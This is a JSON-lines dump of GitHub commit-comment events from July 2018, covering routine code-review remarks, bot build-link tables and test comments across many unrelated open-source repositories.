{"id":"7923073969","type":"CommitCommentEvent","actor":{"login":"rgdoliveira"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29606209,"position":null,"line":null,"path":null,"commit_id":"9766a34cf909566fa41518f09a1b4083a206cea8","created_at":"2018-07-05T13:02:10Z","updated_at":"2018-07-05T13:02:10Z","author_association":"MEMBER","body":"My mistake for missing author name and email in the commit. I created the patch in a new container and forgot to properly configure git."}},"created_at":"2018-07-05T13:02:10Z"}
{"id":"7923080306","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29606221,"position":4,"line":25,"path":"sakura_core/_main/CControlProcess.cpp","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-05T13:03:23Z","updated_at":"2018-07-05T13:03:23Z","author_association":"CONTRIBUTOR","body":"将来windows以外の環境へ移植する際に、\r\nwindowsに依存する部分とそうでない部分を切り分ける目印にできると考えています。\r\n\r\nずっと先の話なので現メンバーの反対を押し切って準備をすすめるほどの理由はありません。\r\n"}},"created_at":"2018-07-05T13:03:23Z"}
{"id":"7923081441","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29606224,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T13:03:37Z","updated_at":"2018-07-05T13:03:37Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |\n|---|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T13:03:37Z"}
{"id":"7923081825","type":"CommitCommentEvent","actor":{"login":"lucaspelloni2"},"repo":{"name":"eureka-blockchain-solutions/eureka-platform"},"payload":{"comment":{"id":29606226,"position":5,"line":5,"path":"src/smartcontracts/truffle.js","commit_id":"0e80e8476c729610b7d1a25dced559f2599d56e3","created_at":"2018-07-05T13:03:41Z","updated_at":"2018-07-05T13:03:41Z","author_association":"MEMBER","body":":)"}},"created_at":"2018-07-05T13:03:41Z"}
{"id":"7923082081","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29606228,"position":null,"line":null,"path":null,"commit_id":"6fdd2049a2a62e754009e2c5089a04804f1e9078","created_at":"2018-07-05T13:03:44Z","updated_at":"2018-07-05T13:03:44Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|macOS|\n|---|---|---|\n|Blender py36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-6fdd204-macos64.zip)|\n|IfcConvert| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-6fdd204-macos64.zip)|\n|IfcGeomServer| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-6fdd204-macos64.zip)|\n|Python 27| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-6fdd204-macos64.zip)|\n|Python 27u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-6fdd204-macos64.zip)|\n|Python 32| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-6fdd204-macos64.zip)|\n|Python 32u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-6fdd204-macos64.zip)|\n|Python 33| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-6fdd204-macos64.zip)|\n|Python 34| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-6fdd204-macos64.zip)|\n|Python 35| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-6fdd204-macos64.zip)|\n|Python 36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-linux64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-6fdd204-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-05T13:03:44Z"}
{"id":"7923083487","type":"CommitCommentEvent","actor":{"login":"Silentttttt"},"repo":{"name":"nebulasio/go-nebulas"},"payload":{"comment":{"id":29606230,"position":14,"line":441,"path":"nf/nvm/engine_v8.go","commit_id":"87eae4506da3f097f756a782347e73303f54d336","created_at":"2018-07-05T13:03:58Z","updated_at":"2018-07-05T13:03:58Z","author_association":"CONTRIBUTOR","body":"考虑放到本函数的最前面"}},"created_at":"2018-07-05T13:03:58Z"}
{"id":"7923084920","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29606234,"position":null,"line":null,"path":null,"commit_id":"f2e065ddf875c2ba7fba63b575b98fb2fd82beb4","created_at":"2018-07-05T13:04:13Z","updated_at":"2018-07-05T13:04:13Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[1] Zobrazit GC ID v adminu](https://trello.com/c/vzwq2rVF/525-1-zobrazit-gc-id-v-adminu)"}},"created_at":"2018-07-05T13:04:13Z"}
{"id":"7923086724","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29606238,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-05T13:04:31Z","updated_at":"2018-07-05T13:04:31Z","author_association":"MEMBER","body":"@pattacini @Nicogene Actually, it is correct that the main function returns an integer where 0 = ok, I don't think that any of these functions is actually returning a return code that is different than `0` or `1`, therefore I might be in favour of changing these functions to return bool, and do this kind of switches in one place only (i.e. in the main function)"}},"created_at":"2018-07-05T13:04:31Z"}
{"id":"7923093413","type":"CommitCommentEvent","actor":{"login":"berryzplus"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29606250,"position":28,"line":28,"path":"sakura_core/_os/ProcessPriority.h","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-05T13:05:47Z","updated_at":"2018-07-05T13:05:47Z","author_association":"CONTRIBUTOR","body":"> このヘッダを用いる人が、あえて windows.h をインクルードせずに別のヘッダをインクルードする用途があるのであれば、そのような対応には意味があると思います。\r\n\r\n単体テストを書きやすいクラスを作るには配慮が必要と考えています。\r\n"}},"created_at":"2018-07-05T13:05:47Z"}
{"id":"7923096104","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29606252,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-05T13:06:16Z","updated_at":"2018-07-05T13:06:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T13:06:16Z"}
{"id":"7923096398","type":"CommitCommentEvent","actor":{"login":"mbouri"},"repo":{"name":"mbouri/F5-ansible"},"payload":{"comment":{"id":29606253,"position":4,"line":10,"path":"playbooks/create_VIP-Pool.yml","commit_id":"072ec051120e7ddc99549ff9cde3a878c352f3fb","created_at":"2018-07-05T13:06:19Z","updated_at":"2018-07-05T13:06:19Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-05T13:06:19Z"}
{"id":"7923096842","type":"CommitCommentEvent","actor":{"login":"I-like-PhysiX"},"repo":{"name":"I-like-PhysiX/project"},"payload":{"comment":{"id":29606255,"position":null,"line":null,"path":null,"commit_id":"db6eaa5c4a88901ad1242cf46e3ff34510606804","created_at":"2018-07-05T13:06:24Z","updated_at":"2018-07-05T13:06:24Z","author_association":"OWNER","body":"delete file"}},"created_at":"2018-07-05T13:06:24Z"}
{"id":"7923105011","type":"CommitCommentEvent","actor":{"login":"Fleischers"},"repo":{"name":"Kourylenko/MyWishList"},"payload":{"comment":{"id":29606266,"position":26,"line":1,"path":"enter.html","commit_id":"94b2369e5a9aa241f1212c412e1f0ac29b322644","created_at":"2018-07-05T13:07:53Z","updated_at":"2018-07-05T13:07:53Z","author_association":"NONE","body":"maybe login.html?"}},"created_at":"2018-07-05T13:07:53Z"}
{"id":"7923108889","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29606272,"position":80,"line":80,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T13:08:35Z","updated_at":"2018-07-05T13:08:35Z","author_association":"MEMBER","body":"No. Using string format in non-translatable string like this is usually a bad idea. Sure, it works, but there is also no real reason to use it."}},"created_at":"2018-07-05T13:08:35Z"}
{"id":"7923111548","type":"CommitCommentEvent","actor":{"login":"Kourylenko"},"repo":{"name":"Kourylenko/MyWishList"},"payload":{"comment":{"id":29606278,"position":26,"line":1,"path":"enter.html","commit_id":"94b2369e5a9aa241f1212c412e1f0ac29b322644","created_at":"2018-07-05T13:09:05Z","updated_at":"2018-07-05T13:09:05Z","author_association":"OWNER","body":"Good idea!\n\nчт, 5 лип. 2018 о 16:07 Glib Ischenko <notifications@github.com> пише:\n\n> maybe login.html?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Kourylenko/MyWishList/commit/94b2369e5a9aa241f1212c412e1f0ac29b322644#commitcomment-29606266>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARdyZCGqadRwL2LGm90OgpsqbBbugBRgks5uDg-pgaJpZM4VD2g->\n> .\n>\n"}},"created_at":"2018-07-05T13:09:05Z"}
{"id":"7923114710","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29606283,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-05T13:09:40Z","updated_at":"2018-07-05T13:09:40Z","author_association":"MEMBER","body":"@drdanz if that's true (the only returned integers of the helper functions are `0` and `1`), then you can certainly go ahead with what you proposed. My point was that we weren't sure about that."}},"created_at":"2018-07-05T13:09:40Z"}
{"id":"7923116259","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29606285,"position":5,"line":229,"path":"src/main/java/ch/njol/skript/lang/Variable.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T13:09:58Z","updated_at":"2018-07-05T13:09:58Z","author_association":"MEMBER","body":"Do not just expose private, potentially unsafe APIs to everyone, especially considering that Javadoc is not particularly helpful in this case."}},"created_at":"2018-07-05T13:09:58Z"}
{"id":"7923117034","type":"CommitCommentEvent","actor":{"login":"fvantienen"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":29606287,"position":115,"line":166,"path":"conf/userconf/tudelft/control_panel.xml","commit_id":"e1ee5873d9cf2619a04db9d6d278b41b3f41b131","created_at":"2018-07-05T13:10:08Z","updated_at":"2018-07-05T13:10:08Z","author_association":"MEMBER","body":"deze staat er 2x?"}},"created_at":"2018-07-05T13:10:08Z"}
{"id":"7923118861","type":"CommitCommentEvent","actor":{"login":"AtillaA"},"repo":{"name":"AtillaA/CI-Test"},"payload":{"comment":{"id":29606291,"position":null,"line":null,"path":null,"commit_id":"3ad5ce176db3ac5c2c229e21408fca588c66495e","created_at":"2018-07-05T13:10:26Z","updated_at":"2018-07-05T13:10:26Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-05T13:10:26Z"}
{"id":"7923122054","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":29606295,"position":null,"line":null,"path":null,"commit_id":"fa48b6efdc8516c50555becf5debabbbbd8bfab5","created_at":"2018-07-05T13:11:03Z","updated_at":"2018-07-05T13:11:03Z","author_association":"MEMBER","body":"But, what if in the future we will need to add a new command-line tool that will provide a richer set of exit codes?"}},"created_at":"2018-07-05T13:11:03Z"}
{"id":"7923122815","type":"CommitCommentEvent","actor":{"login":"lkreimann"},"repo":{"name":"plentymarkets/plugin-ceres"},"payload":{"comment":{"id":29606300,"position":null,"line":null,"path":null,"commit_id":"2c611360df8358b3852d914e4639d7d4f1d4f8e3","created_at":"2018-07-05T13:11:12Z","updated_at":"2018-07-05T13:11:12Z","author_association":"NONE","body":"Wozu das Ö? 😅 Oder war das jetzt ein Easter Egg? "}},"created_at":"2018-07-05T13:11:12Z"}
{"id":"7923123089","type":"CommitCommentEvent","actor":{"login":"tsu2626"},"repo":{"name":"tsu2626/nyobiWorkspace"},"payload":{"comment":{"id":29606301,"position":null,"line":null,"path":null,"commit_id":"3f1868ca0e39ae44803a595d453db3de5ea33865","created_at":"2018-07-05T13:11:15Z","updated_at":"2018-07-05T13:11:15Z","author_association":"OWNER","body":"${commit_hash}で対応されました。"}},"created_at":"2018-07-05T13:11:15Z"}
{"id":"7923126607","type":"CommitCommentEvent","actor":{"login":"chriwo"},"repo":{"name":"ochorocho/joro-typo3reversedeployment"},"payload":{"comment":{"id":29606309,"position":4,"line":6,"path":"composer.json","commit_id":"44890e6bad4403e3900ca478914c94831408d184","created_at":"2018-07-05T13:11:54Z","updated_at":"2018-07-05T13:11:54Z","author_association":"CONTRIBUTOR","body":"That‘s right, I check the changes not with a global installation. Make ist sense to have phar file for a global installation?"}},"created_at":"2018-07-05T13:11:54Z"}
{"id":"7923132809","type":"CommitCommentEvent","actor":{"login":"zlumer"},"repo":{"name":"DucaturFw/neo-dissassembler-front"},"payload":{"comment":{"id":29606316,"position":18,"line":15,"path":"client/store/index.js","commit_id":"dc7083ab81bb48450a7bb81c2338c4c0b8c95bf5","created_at":"2018-07-05T13:13:01Z","updated_at":"2018-07-05T13:13:01Z","author_association":"MEMBER","body":"set `eslint comma-dangle: [\"error\", {\"functions\": \"never\"}]`"}},"created_at":"2018-07-05T13:13:01Z"}
{"id":"7923133594","type":"CommitCommentEvent","actor":{"login":"mivade"},"repo":{"name":"pennmem/ptsa_new"},"payload":{"comment":{"id":29606317,"position":null,"line":null,"path":null,"commit_id":"85990edb9bb796f57b899e987b8a590b520cef5a","created_at":"2018-07-05T13:13:11Z","updated_at":"2018-07-05T13:13:11Z","author_association":"CONTRIBUTOR","body":"What is the reason for this?"}},"created_at":"2018-07-05T13:13:11Z"}
{"id":"7923137927","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29606324,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/expressions/ExprIndexes.java","commit_id":"1c6c80eae6db0b00230385dfc4dd4a25180790c5","created_at":"2018-07-05T13:13:57Z","updated_at":"2018-07-05T13:13:57Z","author_association":"MEMBER","body":"This is a property expression, not simple, not combined. There is an ExpressionType for that, in case (Simple)PropertyExpression is not customizable enough."}},"created_at":"2018-07-05T13:13:57Z"}
{"id":"7923138846","type":"CommitCommentEvent","actor":{"login":"ivanmauricio"},"repo":{"name":"samhstn/My-Config"},"payload":{"comment":{"id":29606326,"position":278,"line":171,"path":"README.md","commit_id":"fa94daa02216dbd83f3dcfb6c8ca447ff46a97be","created_at":"2018-07-05T13:14:08Z","updated_at":"2018-07-05T13:14:08Z","author_association":"NONE","body":"@samhstn Why did you take this script out?"}},"created_at":"2018-07-05T13:14:08Z"}
{"id":"7923139187","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29606329,"position":4,"line":768,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-05T13:14:12Z","updated_at":"2018-07-05T13:14:12Z","author_association":"OWNER","body":"I am doing it, just two things for now:\r\n- I am wondering why the`..` in  `origin/master..`\r\n- why doing it multiple times? right now I have `libqgraph.patch`, I am changing all files to stay in libqos, and then when I will be done I'll just apply the patch and push, no?"}},"created_at":"2018-07-05T13:14:12Z"}
{"id":"7923146604","type":"CommitCommentEvent","actor":{"login":"shyuep"},"repo":{"name":"materialsproject/pymatgen"},"payload":{"comment":{"id":29606342,"position":null,"line":null,"path":null,"commit_id":"18b2fecb4f5483a91683c924576bb9af5cd421aa","created_at":"2018-07-05T13:15:31Z","updated_at":"2018-07-05T13:15:31Z","author_association":"MEMBER","body":"@shyamd You need to add a unittest. This error turned up in the atomate tests, which should not be where the problem is found. "}},"created_at":"2018-07-05T13:15:31Z"}
{"id":"7923150291","type":"CommitCommentEvent","actor":{"login":"rb6502"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29606356,"position":null,"line":null,"path":null,"commit_id":"790009096b58d6554720fdaa657d8035e0774263","created_at":"2018-07-05T13:16:11Z","updated_at":"2018-07-05T13:16:11Z","author_association":"CONTRIBUTOR","body":"It still doesn't save state the docram, which was kind of the entire point of https://github.com/mamedev/mame/commit/1bb565da36017f27a5c844969d914cd76d920405 ."}},"created_at":"2018-07-05T13:16:11Z"}
{"id":"7923151509","type":"CommitCommentEvent","actor":{"login":"wangbuyun"},"repo":{"name":"wangbuyun/qwer"},"payload":{"comment":{"id":29606358,"position":null,"line":null,"path":null,"commit_id":"a672185a0e2993273e427f449f546e86f93877db","created_at":"2018-07-05T13:16:24Z","updated_at":"2018-07-05T13:16:24Z","author_association":"OWNER","body":"safasfd"}},"created_at":"2018-07-05T13:16:24Z"}
{"id":"7923151936","type":"CommitCommentEvent","actor":{"login":"wangbuyun"},"repo":{"name":"wangbuyun/qwer"},"payload":{"comment":{"id":29606359,"position":null,"line":null,"path":null,"commit_id":"a672185a0e2993273e427f449f546e86f93877db","created_at":"2018-07-05T13:16:29Z","updated_at":"2018-07-05T13:16:29Z","author_association":"OWNER","body":"sdfaas"}},"created_at":"2018-07-05T13:16:29Z"}
{"id":"7923152891","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29606364,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T13:16:38Z","updated_at":"2018-07-05T13:16:38Z","author_association":"MEMBER","body":"> Also StringBuilder for performance\r\nCitation needed; it is questionable if it is actually any faster.\r\n\r\nBut I do agree that the indentation is really horrible. @Pikachu920 please fix it ASAP."}},"created_at":"2018-07-05T13:16:38Z"}
{"id":"7923153711","type":"CommitCommentEvent","actor":{"login":"wangbuyun"},"repo":{"name":"wangbuyun/qwer"},"payload":{"comment":{"id":29606367,"position":null,"line":null,"path":null,"commit_id":"a672185a0e2993273e427f449f546e86f93877db","created_at":"2018-07-05T13:16:47Z","updated_at":"2018-07-05T13:16:47Z","author_association":"OWNER","body":"asfda"}},"created_at":"2018-07-05T13:16:47Z"}
{"id":"7923154346","type":"CommitCommentEvent","actor":{"login":"wangbuyun"},"repo":{"name":"wangbuyun/qwer"},"payload":{"comment":{"id":29606370,"position":null,"line":null,"path":null,"commit_id":"a672185a0e2993273e427f449f546e86f93877db","created_at":"2018-07-05T13:16:53Z","updated_at":"2018-07-05T13:16:53Z","author_association":"OWNER","body":"111111"}},"created_at":"2018-07-05T13:16:53Z"}
{"id":"7923154685","type":"CommitCommentEvent","actor":{"login":"wangbuyun"},"repo":{"name":"wangbuyun/qwer"},"payload":{"comment":{"id":29606373,"position":null,"line":null,"path":null,"commit_id":"a672185a0e2993273e427f449f546e86f93877db","created_at":"2018-07-05T13:16:57Z","updated_at":"2018-07-05T13:16:57Z","author_association":"OWNER","body":"2222"}},"created_at":"2018-07-05T13:16:57Z"}
{"id":"7923155457","type":"CommitCommentEvent","actor":{"login":"bhmcarr"},"repo":{"name":"bhmcarr/DailyProgrammer"},"payload":{"comment":{"id":29606377,"position":null,"line":null,"path":null,"commit_id":"e41e91cf0b2e7a02c653b07d04a62abb03943fbc","created_at":"2018-07-05T13:17:06Z","updated_at":"2018-07-05T13:17:06Z","author_association":"OWNER","body":"brain not work good"}},"created_at":"2018-07-05T13:17:06Z"}
{"id":"7923155595","type":"CommitCommentEvent","actor":{"login":"raghubv410"},"repo":{"name":"raghubv410/idsx_cookbooks"},"payload":{"comment":{"id":29606378,"position":null,"line":null,"path":null,"commit_id":"0c5149c15ff265019f29838f48ac0106b2c074d2","created_at":"2018-07-05T13:17:08Z","updated_at":"2018-07-05T13:17:08Z","author_association":"OWNER","body":"Verified this file manually adding comment"}},"created_at":"2018-07-05T13:17:08Z"}
{"id":"7923159824","type":"CommitCommentEvent","actor":{"login":"bensku"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29606384,"position":48,"line":48,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T13:17:52Z","updated_at":"2018-07-05T13:17:52Z","author_association":"MEMBER","body":"Inefficient use of horizontal space."}},"created_at":"2018-07-05T13:17:52Z"}
{"id":"7923162953","type":"CommitCommentEvent","actor":{"login":"ochorocho"},"repo":{"name":"ochorocho/joro-typo3reversedeployment"},"payload":{"comment":{"id":29606390,"position":4,"line":6,"path":"composer.json","commit_id":"44890e6bad4403e3900ca478914c94831408d184","created_at":"2018-07-05T13:18:27Z","updated_at":"2018-07-05T13:18:27Z","author_association":"OWNER","body":"hm... good question. Never built my own phar file. But in general a interesting task."}},"created_at":"2018-07-05T13:18:27Z"}
{"id":"7923165873","type":"CommitCommentEvent","actor":{"login":"stweil"},"repo":{"name":"tesseract-ocr/tesseract"},"payload":{"comment":{"id":29606402,"position":4,"line":261,"path":"src/lstm/network.cpp","commit_id":"d27f5b58f93511f684f05c361fd0ee350fb1cd5d","created_at":"2018-07-05T13:19:00Z","updated_at":"2018-07-05T13:19:00Z","author_association":"CONTRIBUTOR","body":"Fixed in PR #1753."}},"created_at":"2018-07-05T13:19:00Z"}
{"id":"7923168521","type":"CommitCommentEvent","actor":{"login":"rb6502"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29606412,"position":null,"line":null,"path":null,"commit_id":"dc654b8b0f9b4e3d1a9418462f53e8de34321f6f","created_at":"2018-07-05T13:19:27Z","updated_at":"2018-07-05T13:19:27Z","author_association":"CONTRIBUTOR","body":"Yeah, the problem they were having needs more investigation, because this change broke more things than it fixes in my testing."}},"created_at":"2018-07-05T13:19:27Z"}
{"id":"7923178915","type":"CommitCommentEvent","actor":{"login":"BrunoJuchli"},"repo":{"name":"nhibernate/nhibernate-core"},"payload":{"comment":{"id":29606434,"position":null,"line":null,"path":null,"commit_id":"5d77746809f3f9aaaad0ebcf874becef015067ae","created_at":"2018-07-05T13:21:12Z","updated_at":"2018-07-05T13:21:12Z","author_association":"NONE","body":"@fredericDelaporte \r\nThanks a lot. That's the impression I got when reading the source code.\r\n\r\n>I guess your application is using its ViewModelProxyFactory directly, for ensuring all entities get proxified whatever the way they have been loaded. In such case, you should re-implement it by using the original LinFu.DynamicProxy instead I think.\r\n\r\nExactly. There's three use cases which create two slightly different proxy types:\r\n\r\n* proxies without lazy loading support\r\n  * new entities created by the application\r\n  * existing entities loaded by NHibernate\r\n* proxies with lazy loading support\r\n  * existing child entities loaded by NHibernate\r\n\r\n----------------\r\n\r\nI've got some experience with IL-weaving so an extension point for weaving might be an option for us.\r\nAre there any plans to add one and/or would you consider a PR?\r\n\r\nThe reason is that having to basically self-implement the whole \"DynamicProxy\" feature also includes lazy initialization which we would rather not have to implement \"again\".\r\n\r\nOn \"first sight\" I'd expect the following extension points to suffice:\r\n- addings members to woven type, about [here](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L86)\r\n- adding arbitrary content to ctor [before return](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L169)\r\n- adding the ability to extend [`ImplementCallMethodOnImplementation`](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L366) at least before and after [`EmitCallImplementation`](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L379)\r\n  - Optionally another branch [here](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L135) to skip `EmitCallImplementation` in case of adding a method that does not exist on the base-class, entirely.\r\n\r\n(of course it would not be possible to add additional ctor-arguments)\r\n\r\n----------------\r\n\r\nSidenote:\r\n\r\nIt seems the code at [ImplementCallMethodOnEmbeddedComponentId](https://github.com/nhibernate/nhibernate-core/blob/5.1.3/src/NHibernate/Proxy/NHibernateProxyBuilder.cs#L131) is superfluous. All implementations of `bool IAbstractComponentType.IsMethodOf(MethodBase method);` uncoditionally return `false`, thus the branch is never hit.\r\nOr is this an extension point for customization?"}},"created_at":"2018-07-05T13:21:12Z"}
{"id":"7923181545","type":"CommitCommentEvent","actor":{"login":"RishabhRD"},"repo":{"name":"RishabhRD/Maps-HashTables-And-SkipLists"},"payload":{"comment":{"id":29606444,"position":null,"line":null,"path":null,"commit_id":"cb02c061a13441c9e9e2d8d863ceb98211746ac2","created_at":"2018-07-05T13:21:38Z","updated_at":"2018-07-05T13:21:38Z","author_association":"OWNER","body":"Build Files\r\n"}},"created_at":"2018-07-05T13:21:38Z"}
{"id":"7923182679","type":"CommitCommentEvent","actor":{"login":"admkakaroto"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29606446,"position":null,"line":null,"path":null,"commit_id":"e13ca63cc8accb5ad4c8d711c6dfd5b954f4967e","created_at":"2018-07-05T13:21:50Z","updated_at":"2018-07-05T13:21:50Z","author_association":"CONTRIBUTOR","body":"the guild storage only has 500 slots after this upgrade, but the players who have 600 items in the storage, how does it work?"}},"created_at":"2018-07-05T13:21:50Z"}
{"id":"7923188588","type":"CommitCommentEvent","actor":{"login":"m-tmatma"},"repo":{"name":"sakura-editor/sakura"},"payload":{"comment":{"id":29606463,"position":4,"line":25,"path":"sakura_core/_main/CControlProcess.cpp","commit_id":"9515cb9c4218a33ada395b2517e5c737d033ccd6","created_at":"2018-07-05T13:22:49Z","updated_at":"2018-07-05T13:22:49Z","author_association":"MEMBER","body":"その目的だったら、ヘッダの中の実装が\r\nwindows 依存になるのであって呼び出し元の\r\nソースではないように思います。\r\n\r\nプラットフォーム依存部分は特定のクラスに隠蔽して呼び出し元では、プラットフォームに依存しないように作るのがセオリーです。"}},"created_at":"2018-07-05T13:22:49Z"}
